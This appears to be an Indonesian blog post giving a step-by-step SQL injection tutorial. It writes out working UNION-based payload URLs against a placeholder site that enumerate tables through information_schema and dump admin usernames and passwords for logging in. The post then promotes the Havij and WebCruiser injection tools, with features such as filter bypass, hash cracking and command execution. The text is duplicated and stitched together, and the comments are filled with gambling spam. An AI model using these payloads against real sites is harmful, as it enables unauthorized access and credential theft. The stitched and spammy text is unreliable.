apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tersebut
ini salah satu cara melakukan tekhnik SQL injection:
1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah
2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
Contoh :
atau
4. Maka akan muncul pesan error…
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.
5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by
Contoh :
Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–”. Terserah aja…
Kalo “+” sebagai penghubung perintah…
6. Nah sampe sini langsung dah nyobain satu2…
Sampai muncul error…
Misalkan errornya disini…
Berarti yang kita ambil adalah “9″
7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
Trus perhatikan angka berapa yang keluar (Kayak togel aja… ;p)
8. Misalnya angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”
9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…
Contoh :
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…
Misalnya yang lo liat adalah table “admin”
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:
Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…
Contoh :
Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda…
—————————————————
anda masih belum paham tentang apa SQL injection ?...silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.(Cara diatas sudah dicoba pada Website kantor"buat uji coba"ternyata eng ink enk...)
http://www.target.com/berita.php?id=100
Contoh :
http://www.target.com/berita.php?id=100'
http://www.target.com/berita.php?id=-100
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.
5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by
Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
Kalo “+” sebagai penghubung perintah…
6. Nah sampe sini langsung dah nyobain satu2…
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error) http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga) http://www.target.com/berita.php?id=100+order+by+3/* (capek dah) http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)
Misalkan errornya disini…
http://www.target.com/berita.php?id=100+order+by+10/*
http://www.target.com/berita.php?id=100+order+by+9/*
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
8. Misalnya angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Misalnya yang lo liat adalah table “admin”
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Langsung aja kita liat isinya…
Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
—————————————————
anda masih belum paham tentang apa SQL injection ?...silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.(Cara diatas sudah dicoba pada Website kantor"buat uji coba"ternyata eng ink enk...)
oke selamat mencoba. yang terpenting jangan dilakukan di web teman anda ataupun di website Lokal.
referensi :
http://jasakom.com
http://ezine.echo.or.id
http://cruzenaldo.co.cc
http://students.ee.itb.ac.id
Atau mau mencoba tool yang baru saya dapatkan? namanya Havij. Adapun fitur2nya:
Dengan begitu berkembangnya internet dewasa ini, situs web yang bermunculan tiap hari, begitu pula dengan virus dll. Bagi yang hobby mengutak atik website tentunya tidak asing lagi dengan istilah security untuk website/situs, mulai dari istilah sql injections dan lain sebagainya.
Kali ini saya akan berbagi tools untuk menguji dan mencari kelemahan website/situs, WebCruiser Web Vulnerability Scanner Enterprise v2.5.0, adalah sebuah perangkat lunak yang khusus dirancang untuk tujuan ini.
WebCruiser Web Vulnerability Scanner adalah sebuah perangkat lunak penetrasi web yang efektif dan kuat yang akan membantu kita dalam mengaudit website/situs, juga memiliki scanner kerentanan dan sengkaian alat keamanan.
Mendukung pemindaian situs POC (Proof of concept) kerentanan situs seperti: SQL Injection, Cross Site Scripting, XPath Injection dll. juga, WebCruiser juga adalah sebuah alat SQL injection otomatis, XPath injection tool, dan Cross Site Scripting tool!
Apa itu WebCruiser?, WebCruiser adalah alat untuk:
referensi :
http://jasakom.com
http://ezine.echo.or.id
http://cruzenaldo.co.cc
http://students.ee.itb.ac.id
Atau mau mencoba tool yang baru saya dapatkan? namanya Havij. Adapun fitur2nya:
- Supported Databases with injection methods:
- MsSQL 2000/2005 with error
- MsSQL 2000/2005 no error (union based)
- MySQL (union based)
- MySQL Blind
- MySQL error based
- Oracle (union based)
- MsAccess (union based)
- Automatic database detection
- Automatic type detection (string or integer)
- Automatic keyword detection (finding difference between the positive and negative response)
- Trying different injection syntaxes
- Proxy support
- Real time result
- Options for replacing space by /**/,+,… against IDS or filters
- Avoid using strings (magic_quotes similar filters bypass)
- Bypassing illegal union
- Full customizable http headers (like referer and user agent)
- Load cookie from site for authentication
- Guessing tables and columns in mysql<5 (also in blind) and MsAccess
- Fast getting tables and columns for mysql
- Multi thread Admin page finder
- Multi thread Online MD5 cracker
- Getting DBMS Informations
- Getting tables, columns and data
- Command executation (mssql only)
- Reading system files (mysql only)
- Insert/update/delete data
Kalau Link diatas tidak bisa, Silahkan Klik Disini
Berikut saya tuliskan cara mencari kelemahan Website
Dengan begitu berkembangnya internet dewasa ini, situs web yang bermunculan tiap hari, begitu pula dengan virus dll. Bagi yang hobby mengutak atik website tentunya tidak asing lagi dengan istilah security untuk website/situs, mulai dari istilah sql injections dan lain sebagainya.
Kali ini saya akan berbagi tools untuk menguji dan mencari kelemahan website/situs, WebCruiser Web Vulnerability Scanner Enterprise v2.5.0, adalah sebuah perangkat lunak yang khusus dirancang untuk tujuan ini.
WebCruiser Web Vulnerability Scanner adalah sebuah perangkat lunak penetrasi web yang efektif dan kuat yang akan membantu kita dalam mengaudit website/situs, juga memiliki scanner kerentanan dan sengkaian alat keamanan.
Mendukung pemindaian situs POC (Proof of concept) kerentanan situs seperti: SQL Injection, Cross Site Scripting, XPath Injection dll. juga, WebCruiser juga adalah sebuah alat SQL injection otomatis, XPath injection tool, dan Cross Site Scripting tool!
Apa itu WebCruiser?, WebCruiser adalah alat untuk:
- SQL Injection Tool pertama untuk Windows 7, Windows Vista
- Web Vulnerability Scanner
- SQL Injection Scanner
- Cross Site Scripting Scanner
- XPath Injection Scanner
- Automatic SQL Injection Tool (POC)
- Cross Site Scripting Tool (POC)
- XPath Injection Tool (POC)
- Post Data Resend Tool
- Crawler(Site Directori dan File)
- Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection dll.
- SQL Injection Scanner
- SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept)
- SQL Injection for SQL Server: PlainText/Union/Blind Injection
- SQL Injection for MySQL: PlainText/Union/Blind Injection
- SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection
- SQL Injection for DB2: Union/Blind Injection
- SQL Injection for Access: Union/Blind Injection
- Post Data Resend
- Cross Site Scripting Scanner and POC
- XPath Injection Scanner and POC
- Auto Get Cookie From Web Browser For Authentication
- Report Output.
+ komentar + 7 komentar
rumit amat
totobet
singapore pools
toto sgp
sgp prize
totokl
angka keluar sgp
hk hari ini
jaya togel
live sgp
result sidney
no hk
togel singapore 2018
bocoran hk
togel hkg
keluaran hongkong
togel hongkongkong 2017
sgp hari ini
pengeluaran sgp hari ini
nomor hk
keluaran sgp hari ini
indo togel
togel hongkongkong
sgp pools
tgl sgp
dt hk
data pengeluaran sgp
data togel hongkong
live result sgp
datasinga
totobet hongkong
pengeluaran sidney
keluaran hk hari ini
prediksi togel
data singa
keluaran togel
totohk
main togel online mto
cara main judi togel online
daftar situs togel online terpercaya
pengeluaran togel hk online
bandar togel singapura online
bo togel online
cara daftar togel online di indotogel
kumpulan bandar togel online terpercaya
bermain togel online
togel sgp online
daftar agen togel online terpercaya
kumpulan togel online terpercaya
nomer togel online
togel online king4d
hadiah togel online
master togel online
pengeluaran togel online hari ini
nomor sgp togel online
agen togel online king4d
agen togel online terbaik
king4d com togel online
daftar togel online king4d
online togel hongkong
keluaran togel online
forum togel online
cara menang togel online
online togel terpercaya
togel hongkong online hari ini
rgo togel online
togel online live
daftar togel online penipu
komonitas togel online
togel online terbesar dan terpercaya
cara daftar togel online king4d
togel hongkong online live
cara daftar togel online singapura
cara pasang togel hongkong online
main togel online mto
cara main judi togel online
daftar situs togel online terpercaya
pengeluaran togel hk online
bandar togel singapura online
bo togel online
cara daftar togel online di indotogel
kumpulan bandar togel online terpercaya
bermain togel online
togel sgp online
daftar agen togel online terpercaya
online togel singapura
cara deposit togel online
situs judi togel online
agen bola online sbobet ibcbet togel online
pasang togel online terpercaya
nomor togel singapura online
pangerantoto online togel
prediksi togel singapura online
rajatogel88.com bandar togel dan agen togel online terpercaya
togel online resmi
prediksi togel online
kotauang togel online
keluaran togel singapura online
istana impian togel online
bandar togel online terbaik
togel singapura online terpercaya
keluaran togel hongkong online
nomor hk togel online
togel online singapura hari ini
ttwinner togel online
pasang togel singapore online
togel hk online hari ini
daftar bandar togel online penipu
situs resmi togel online
no togel online
togel sydney online
komunitas togel online
togel online penipu
bandar togel online terpercaya dan berbayar
daftar judi togel online
Yg coment bandar togel smua
Post a Comment